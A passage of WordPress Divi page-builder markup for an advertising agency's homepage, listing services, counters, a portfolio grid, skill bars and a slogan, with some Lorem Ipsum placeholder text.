icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>It is important for the creative process and our lives. A key component of visual marketing to let businesses succeed.</span></p>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Media\" use_icon=\"on\" font_icon=\"%%103%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"100ms\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Strategically using new age media and creating a media mix effectively to evolve a sales funnel or brand awareness to engagement.</span></p>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Digital\" use_icon=\"on\" font_icon=\"%%107%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"200ms\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Digital has emerged as one of the efficient media, there is no spill over with the help of professional targeting &amp; even individual targeting is possible.</span></p>[/et_pb_blurb][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" use_custom_gutter=\"on\" gutter_width=\"2\" make_equal=\"on\" admin_label=\"Services\" _builder_version=\"3.25\" max_width=\"80%\" custom_padding=\"25px||25px|\" use_custom_width=\"on\" width_unit=\"off\"][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Business Strategy\" use_icon=\"on\" font_icon=\"%%101%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Gaining the competitive edge with Integrated Marketing Communications (IMC) or building product marketing strategy / Go to market strategy, We are in.</span></p>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Web Design\" use_icon=\"on\" font_icon=\"%%106%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"100ms\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p>Online presence of any brand/product/service starts with a well defined and clearly communicated website. Website is the key and elementry step for any advertising campaign. So be ready to a bolder start.</p>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Design/Video/Photo\" use_icon=\"on\" font_icon=\"%%108%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"200ms\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Design is not Art, Art is about the Artist, &amp; Design is about the user. Blending &amp; Balancing Art, Design, Copy &amp; Business Objective is what we do.</span></p>[/et_pb_blurb][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Video Section\" _builder_version=\"4.4.9\" use_background_color_gradient=\"on\" background_color_gradient_start=\"#ffffff\" background_color_gradient_end=\"#d4b068\" background_color_gradient_start_position=\"65%\" background_color_gradient_end_position=\"65%\" custom_padding=\"|||\"][et_pb_row admin_label=\"Video\" _builder_version=\"3.25\" custom_padding=\"0px|0px|0px|0px\" animation_style=\"slide\" animation_direction=\"top\" animation_intensity_slide=\"4%\" animation_starting_opacity=\"100%\" box_shadow_style=\"preset1\" box_shadow_blur=\"77px\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_video src=\"https://www.youtube.com/watch?v=f47r43eO6BU&t=5s\" image_src=\"//i.ytimg.com/vi/f47r43eO6BU/hqdefault.jpg\" thumbnail_overlay_color=\"rgba(0,0,0,0.6)\" _builder_version=\"4.5.2\" animation_direction=\"bottom\" box_shadow_style=\"preset5\" box_shadow_vertical=\"0px\" box_shadow_spread=\"20px\" box_shadow_color=\"#ffffff\"][/et_pb_video][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Fun Fact Section\" _builder_version=\"4.4.9\" background_color=\"#d4b068\" custom_margin=\"|||\" custom_padding=\"60px||50px||false|false\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2><span style=\"color: #ffffff;\">Generating New Ideas. Solving real Problems</span></h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||\" text_text_color=\"#353740\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p>Ideas are relevant if it has power to solve the real problem at hand. We are always keen on working practical ideas in the realtime business atmosphere.</p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_4,1_4,1_4,1_4\" admin_label=\"Fun Fact\" _builder_version=\"3.25\" custom_margin=\"|||\" custom_padding=\"40px||40px|\" animation_style=\"zoom\" animation_direction=\"top\" animation_intensity_zoom=\"10%\"][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Projects\" number=\"350\" percent_sign=\"off\" _builder_version=\"4.4.9\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\"][/et_pb_number_counter][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Satisfied Clients\" number=\"62\" percent_sign=\"off\" _builder_version=\"4.4.9\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\" animation_delay=\"100ms\"][/et_pb_number_counter][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Ongoing Projects\" number=\"16\" percent_sign=\"off\" _builder_version=\"4.4.9\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\" animation_delay=\"200ms\"][/et_pb_number_counter][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Cups Of Coffee\" number=\"906\" percent_sign=\"off\" _builder_version=\"4.4.9\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\" animation_delay=\"300ms\"][/et_pb_number_counter][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Feature Section\" _builder_version=\"4.4.9\" custom_margin=\"|||\" custom_padding=\"50px||3px||false|false\"][et_pb_row column_structure=\"1_2,1_2\" use_custom_gutter=\"on\" gutter_width=\"4\" custom_padding_last_edited=\"on|phone\" admin_label=\"Feature\" module_class=\" et_pb_row_fullwidth\" _builder_version=\"4.5.1\" width=\"86%\" width_tablet=\"80%\" width_phone=\"\" width_last_edited=\"on|desktop\" max_width=\"86%\" max_width_tablet=\"80%\" max_width_phone=\"\" max_width_last_edited=\"on|desktop\" custom_padding=\"40px||23px||false|false\" custom_padding_tablet=\"\" custom_padding_phone=\"0px||||false|false\" make_fullwidth=\"on\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/Why-we.png\" alt=\"creative advertising agency\" title_text=\"Why we\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"4.5.2\" custom_margin=\"61px|||||\" custom_margin_tablet=\"\" custom_margin_phone=\"0px||||false|false\" custom_margin_last_edited=\"on|phone\" animation_style=\"slide\" animation_direction=\"right\" animation_intensity_slide=\"8%\" animation_starting_opacity=\"100%\" hover_enabled=\"0\"][/et_pb_image][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"7%||7%|\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_text_align=\"left\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" max_width=\"700px\" module_alignment=\"left\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\" locked=\"off\"]<h2><span>Why choose us?</span></h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" max_width=\"700px\" module_alignment=\"left\" custom_margin=\"|||\" custom_padding=\"||20px|\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\" locked=\"off\"]<p><span>WhatTheHell? is not some advertising, digital and design agency. An irreverent ideas farm seems more like it. Always eager to work with people who are looking to do brilliant things to their brands.</span></p>\n<p> <span>We help in realizing brand aspirations through our in-depth research &amp; analytics and translate them into irreverent creative ideas. We always remember that there’s more to marketing communication than top-funnel awareness building through BTL, ATL, Outdoor, or Digital Media Publishing.</span></p>[/et_pb_text][et_pb_button button_url=\"#\" button_text=\"Learn More\" _builder_version=\"3.16\" custom_button=\"on\" button_text_color=\"#747d88\" button_border_width=\"4px\" button_border_color=\"#747d88\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#747d88\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"20%\" button_text_color_hover=\"#747d88\" button_border_color_hover=\"#747d88\" button_letter_spacing_hover=\"2px\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"on\" button_text_color__hover=\"#747d88\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"on\" button_border_color__hover=\"#747d88\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"on\" button_letter_spacing__hover=\"2px\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_bg_color__hover=\"rgba(0,0,0,0)\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Latest Work Section\" _builder_version=\"4.4.9\" background_color=\"#f7f7f7\" custom_padding=\"50px||50px||false|false\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"|auto|2px|auto||\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Our Latest Work</h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p><span>Creative &amp; Effective work around practical marketing problems. Next update will have your creatives.</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" make_equal=\"on\" use_custom_gutter=\"on\" gutter_width=\"1\" specialty=\"on\" padding_top_1=\"0px\" admin_label=\"Work Section\" module_class=\" et_pb_specialty_fullwidth\" _builder_version=\"3.22\" background_color=\"#f7f7f7\" inner_width=\"100%\" inner_width_tablet=\"100%\" inner_width_phone=\"\" inner_width_last_edited=\"on|desktop\" inner_max_width=\"100%\" inner_max_width_tablet=\"100%\" inner_max_width_phone=\"\" inner_max_width_last_edited=\"on|desktop\" custom_padding=\"0px|5%|0px|5%\" make_fullwidth=\"on\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" padding_top__hover=\"0px\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/800x800-w.jpg\" title_text=\"800x800 w\" url=\"#\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"4.5.2\" animation_style=\"flip\" animation_intensity_flip=\"30%\" hover_enabled=\"0\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\"][/et_pb_image][/et_pb_column][et_pb_column type=\"1_2\" specialty_columns=\"2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_row_inner _builder_version=\"3.25\" custom_padding=\"0px||0px|\"][et_pb_column_inner saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/800x400.jpg\" title_text=\"800x400\" url=\"#\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"4.5.2\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"30%\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\"][/et_pb_image][/et_pb_column_inner][/et_pb_row_inner][et_pb_row_inner column_structure=\"1_2,1_2\" _builder_version=\"4.5.2\" custom_margin=\"||||false|false\" custom_padding=\"0px||0px|\"][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/800x800..1.jpg\" title_text=\"800x800..1\" url=\"#\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"4.5.2\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"30%\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\"][/et_pb_image][/et_pb_column_inner][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/800x800.jpg\" title_text=\"800x800\" url=\"#\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"4.5.2\" animation_style=\"flip\" animation_intensity_flip=\"30%\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\"][/et_pb_image][/et_pb_column_inner][/et_pb_row_inner][/et_pb_column][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Button Section\" _builder_version=\"4.4.9\" background_color=\"#f7f7f7\" custom_padding=\"0px||50px||false|false\"][et_pb_row _builder_version=\"3.25\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_button button_url=\"#\" button_text=\"See More\" button_alignment=\"center\" _builder_version=\"3.16\" custom_button=\"on\" button_text_color=\"#747d88\" button_border_width=\"4px\" button_border_color=\"#747d88\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#747d88\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"20%\" button_text_color_hover=\"#747d88\" button_border_color_hover=\"#747d88\" button_letter_spacing_hover=\"2px\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"on\" button_text_color__hover=\"#747d88\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"on\" button_border_color__hover=\"#747d88\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"on\" button_letter_spacing__hover=\"2px\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_bg_color__hover=\"rgba(0,0,0,0)\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Skill Section\" _builder_version=\"4.4.9\" custom_padding=\"50px||50px||false|false\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\" locked=\"off\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Our Skills</h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.5.1\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p>We have a dedicated team to build new tools and technique, to complete the day today repetitive work with precision.</p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_2,1_2\" admin_label=\"Skill\" _builder_version=\"3.25\" custom_padding=\"20px||10px|\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" custom_margin=\"|||\" custom_padding=\"||20px|\" animation_style=\"flip\" animation_intensity_flip=\"20%\"]Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make a type specimen book. It is a long established fact that a reader. It was popularised in the 1960s with the release.\r[/et_pb_text][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_counters bar_bg_color=\"#d4b068\" use_percentages=\"off\" _builder_version=\"4.4.9\" title_font=\"Montserrat|||on|||||\" title_text_color=\"#353740\" title_font_size=\"12px\" title_letter_spacing=\"1px\" title_line_height=\"2em\" percent_font_size=\"1px\" custom_padding=\"|||\" animation_style=\"fold\" animation_direction=\"left\" animation_intensity_fold=\"30%\"][et_pb_counter percent=\"90\" _builder_version=\"3.0.83\" title_font=\"||||||||\" percent_font=\"||||\" background_color=\"#ececee\" custom_margin=\"||35px|\" custom_padding=\"|||\" background_enable_color_default=\"on\" parallax_default=\"off\" parallax_method_default=\"on\" bar_background_color_default=\"#d4b068\" use_percentages=\"off\" allow_player_pause_default=\"off\"]Branding - 90%\r[/et_pb_counter][et_pb_counter percent=\"77\" _builder_version=\"3.0.83\" title_font=\"||||||||\" percent_font=\"||||\" background_color=\"#ececee\" custom_margin=\"||35px|\" custom_padding=\"|||\" background_enable_color_default=\"on\" parallax_default=\"off\" parallax_method_default=\"on\" bar_background_color_default=\"#d4b068\" use_percentages=\"off\" allow_player_pause_default=\"off\"]Lead/Sales Generation Campaign - 77%\r[/et_pb_counter][et_pb_counter percent=\"85%\" _builder_version=\"3.0.83\" title_font=\"||||||||\" percent_font=\"||||\" background_color=\"#ececee\" custom_margin=\"||35px|\" custom_padding=\"|||\" background_enable_color_default=\"on\" parallax_default=\"off\" parallax_method_default=\"on\" bar_background_color_default=\"#d4b068\" use_percentages=\"off\" allow_player_pause_default=\"off\"]Digital Advertising - 85%\r[/et_pb_counter][/et_pb_counters][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Gradient Background Color Section\" _builder_version=\"4.5.2\" background_color_gradient_direction=\"90deg\" background_image=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/Artboard-4.png\" custom_margin=\"||78px|\" custom_margin_tablet=\"||0px|\" custom_margin_phone=\"\" custom_margin_last_edited=\"on|phone\" custom_padding=\"10%||0px|\"][et_pb_row _builder_version=\"3.25\" custom_padding=\"0px|0px|0px|0px\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/Artboard-Copy-12.png\" alt=\"Advertising agency in delhi\" title_text=\"Advertising agency in delhi\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"4.5.2\" custom_margin=\"||-56px|\" custom_margin_tablet=\"||10%|\" custom_margin_phone=\"\" custom_margin_last_edited=\"on|phone\" custom_padding=\"|||\" animation_style=\"slide\" animation_direction=\"left\" animation_duration=\"1500ms\" animation_intensity_slide=\"10%\" animation_starting_opacity=\"100%\" hover_enabled=\"0\" locked=\"off\"][/et_pb_image][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Quote Section\" _builder_version=\"3.22\" custom_margin=\"40px||50px|\"][et_pb_row admin_label=\"Quote\" _builder_version=\"3.25\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Quote\" _builder_version=\"4.5.2\" text_text_color=\"#747d88\" text_font_size=\"24px\" text_line_height=\"1.8em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"flip\" animation_direction=\"top\" animation_intensity_flip=\"20%\"]<p>NOBODY READS ADS, PEOPLE READ WHAT INTERESTS THEM &amp; SOMETIME IT\'S AN AD</p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" make_equal=\"on\" use_custom_gutter=\"on\" gutter_width=\"1\" specialty=\"on\" padding_top_1=\"140px\" padding_top_2=\"0px\" padding_left_1=\"10%\" admin_label=\"Feature Section\" module_class=\" et_pb_specialty_fullwidth\" _builder_version=\"3.22\" background_color=\"#f7f7f7\" inner_width=\"100%\" inner_width_tablet=\"100%\" inner_width_phone=\"\" inner_width_last_edited=\"on|desktop\" inner_max_width=\"100%\" inner_max_width_tablet=\"100%\" inner_max_width_phone=\"\" inner_max_width_last_edited=\"on|desktop\" custom_margin=\"|||\" custom_padding=\"0px||3px|||\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"100px\" box_shadow_color=\"#ffffff\" make_fullwidth=\"on\"][et_pb_column type=\"1_2\" specialty_columns=\"2\" _builder_version=\"3.25\" custom_padding=\"|||\" padding_left__hover=\"10%\" padding_top__hover=\"140px\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_row_inner use_custom_gutter=\"on\" make_equal=\"on\" admin_label=\"Feature Titile\" _builder_version=\"3.25\" max_width=\"75%\" custom_margin=\"|||\" custom_padding=\"||10px|\"][et_pb_column_inner saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" 